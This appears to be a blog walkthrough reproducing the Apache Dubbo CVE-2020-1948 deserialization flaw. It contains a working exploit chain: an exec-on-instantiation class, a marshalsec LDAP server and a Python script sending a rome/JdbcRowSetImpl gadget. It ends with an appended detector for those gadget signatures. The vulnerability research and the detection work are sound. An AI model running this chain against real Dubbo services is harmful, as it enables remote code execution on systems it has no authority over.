[CVE] Reproducing the Dubbo security vulnerability CVE-2020-1948
Environment
➜ ~ java -version
java version "1.8.0_121"
Java(TM) SE Runtime Environment (build 1.8.0_121-b13)
Java HotSpot(TM) 64-Bit Server VM (build 25.121-b13, mixed mode)
➜ ~ uname -a
Darwin simondemac.local 18.7.0 Darwin Kernel Version 18.7.0: Tue Aug 20 16:57:14 PDT 2019; root:xnu-4903.271.2~2/RELEASE_X86_64 x86_64
➜ ~ sw_vers
ProductName: Mac OS X
ProductVersion: 10.14.6
BuildVersion: 18G103
Preparing the provider service
Use the official demo directly; after cloning it, make a few small changes, the main one being an extra jar dependency.
git clone https://github.com/apache/dubbo-spring-boot-project
cd dubbo-spring-boot-project
git checkout 2.7.1 -b b2.7.1
Then import the project into your IDE of choice.
Add the following dependency to the provider-sample pom.xml (dubbo-spring-boot-project/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml):
<dependency>
    <groupId>com.rometools</groupId>
    <artifactId>rome</artifactId>
    <version>1.7.0</version>
</dependency>
Change the default port in dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties to 12347.
Run DubboAutoConfigurationProviderBootstrap to start the provider.
Preparing ExploitMac
public class ExploitMac {
    public ExploitMac() {
        try {
            // launches Calculator.app when the class is instantiated
            java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (java.io.IOException e) {
            e.printStackTrace();
        }
    }
}
Compile ExploitMac.java:
javac ExploitMac.java
Preparing an HTTP server
Install python3; on a Mac you can install it with Homebrew, or download the package from the official site.
Start an HTTP server in the directory containing the ExploitMac.class compiled above:
python3 -m http.server 8088
Preparing marshalsec
Clone it from git and package it yourself:
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn package -DskipTests
Start marshalsec (the jar lives in target/, so the path is relative to that directory):
cd target
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8088/\#ExploitMac 8087
Preparing dubbo-consumer-demo.py
from dubbo.codec.hessian2 import Decoder, new_object
from dubbo.client import DubboClient

# connect to the provider started above
client = DubboClient('127.0.0.1', 12347)

JdbcRowSetImpl = new_object(
    'com.sun.rowset.JdbcRowSetImpl',
    dataSource="ldap://127.0.0.1:8087/ExploitMac",
    strMatchColumns=["foo"]
)
JdbcRowSetImplClass = new_object(
    'java.lang.Class',
    name="com.sun.rowset.JdbcRowSetImpl",
)
toStringBean = new_object(
    'com.rometools.rome.feed.impl.ToStringBean',
    beanClass=JdbcRowSetImplClass,
    obj=JdbcRowSetImpl
)
resp = client.send_request_and_return_response(
    service_name='com.code260.ss.dubbo.demov.facade.service.UserService',
    method_name='sayHello',
    args=[toStringBean])
Installing dubbo-py
python3 -m pip install dubbo-py
Run the script above:
python3 dubbo-consumer-demo.py
Reproduced: the Calculator pops up successfully…
All posts on this blog are licensed under CC BY-SA 3.0 unless otherwise stated. Please credit the source when reposting!
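The following is an added, defender-side example; it is not code from this post or from the Dubbo project. It is a small Python detector that parses the 16-byte Dubbo protocol header (magic 0xdabb, 1-byte flags, 1-byte status, 8-byte request id, 4-byte big-endian body length; that layout is assumed from the Dubbo wire protocol) and scans the Hessian2 body for the gadget class names and JNDI URL scheme carried by the request above. The sample frames are constructed inline, the hessian_string helper is a simplified encoder used only to build them, and all function and indicator names are my own.

```python
import struct

# Dubbo wire-protocol header layout (assumed from the Dubbo protocol):
# 2 bytes magic 0xdabb, 1 byte flags, 1 byte status, 8 bytes request id,
# 4 bytes big-endian body length, then the serialized body.
DUBBO_MAGIC = b"\xda\xbb"
HEADER_LEN = 16
FLAG_REQUEST, FLAG_TWOWAY, SERIALIZATION_HESSIAN2 = 0x80, 0x40, 0x02

# Indicators copied from the class names and URL scheme used by the request
# in the post above; rmi:// is the other JNDI scheme the same sink accepts.
GADGET_INDICATORS = (
    b"com.rometools.rome.feed.impl.ToStringBean",
    b"com.sun.rowset.JdbcRowSetImpl",
    b"ldap://",
    b"rmi://",
)


def parse_frame(frame: bytes):
    """Split one Dubbo frame into (flags, status, request_id, body).

    Raises ValueError for a bad magic or a body shorter than the header claims,
    so a malformed frame is never silently reported as clean."""
    if len(frame) < HEADER_LEN or frame[:2] != DUBBO_MAGIC:
        raise ValueError("not a Dubbo frame")
    flags, status, req_id, body_len = struct.unpack(">BBQI", frame[2:HEADER_LEN])
    body = frame[HEADER_LEN:HEADER_LEN + body_len]
    if len(body) != body_len:
        raise ValueError("truncated body: header claims %d bytes, got %d" % (body_len, len(body)))
    return flags, status, req_id, body


def scan_frame(frame: bytes):
    """Return the indicators present in the frame body (empty list = nothing matched).

    Hessian2 stores strings as length-prefixed UTF-8, so a raw substring search
    over the body finds class names and URLs without a full Hessian2 parser."""
    _, _, _, body = parse_frame(frame)
    return [ind.decode() for ind in GADGET_INDICATORS if ind in body]


# --- helpers for constructing sample input (simplified, example only) ---

def hessian_string(s: str) -> bytes:
    """Encode s as a single Hessian2 string chunk ('S' + 16-bit length + UTF-8)."""
    data = s.encode()
    return b"S" + struct.pack(">H", len(data)) + data


def build_request(body: bytes, req_id: int = 1) -> bytes:
    """Wrap a body in a two-way Hessian2 request header."""
    flags = FLAG_REQUEST | FLAG_TWOWAY | SERIALIZATION_HESSIAN2
    return DUBBO_MAGIC + struct.pack(">BBQI", flags, 0, req_id, len(body)) + body


# Constructed sample: an ordinary sayHello call (service name is hypothetical).
BENIGN_FRAME = build_request(b"".join(hessian_string(s) for s in (
    "2.0.2", "org.example.DemoService", "0.0.0", "sayHello",
    "Ljava/lang/String;", "world",
)))

# Constructed sample: the same call shape, but the argument names the gadget
# classes and JNDI URL from the request in the post (not a real serialized object).
SUSPICIOUS_FRAME = build_request(b"".join(hessian_string(s) for s in (
    "2.0.2", "org.example.DemoService", "0.0.0", "sayHello",
    "Ljava/lang/Object;",
    "com.rometools.rome.feed.impl.ToStringBean",
    "com.sun.rowset.JdbcRowSetImpl",
    "ldap://127.0.0.1:8087/ExploitMac",
)))

if __name__ == "__main__":
    for name, frame in (("benign", BENIGN_FRAME), ("suspicious", SUSPICIOUS_FRAME)):
        print(name, scan_frame(frame) or "clean")
```

Class-name signatures like these are a monitoring stopgap, not a fix: the low five bits of the flags byte give the serialization id, and non-Hessian2 serializations encode class names differently, so the scan only covers the Hessian2 case shown here. The durable mitigation is keeping Dubbo patched and keeping gadget-bearing libraries such as the rome dependency added above off the provider's classpath.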